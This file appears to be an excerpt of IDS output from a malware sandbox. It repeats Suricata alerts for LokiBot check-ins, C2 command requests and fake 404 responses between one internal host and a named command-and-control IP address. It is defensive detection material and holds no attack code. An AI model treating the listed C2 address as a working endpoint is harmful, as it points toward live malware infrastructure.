Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64376
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64365
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64416
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64409
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64423
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64369
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64400
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64364
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64442
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64424
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64396
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64412
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64363
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64408
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64433
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:55843
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64449
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64403
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49714
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64374
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64372
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64432
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64382
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64421
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64390
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64445
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64443
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64361
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64375
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64386
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64358
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64427
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64385
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64441
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64355 -> 45.149.241.169:80
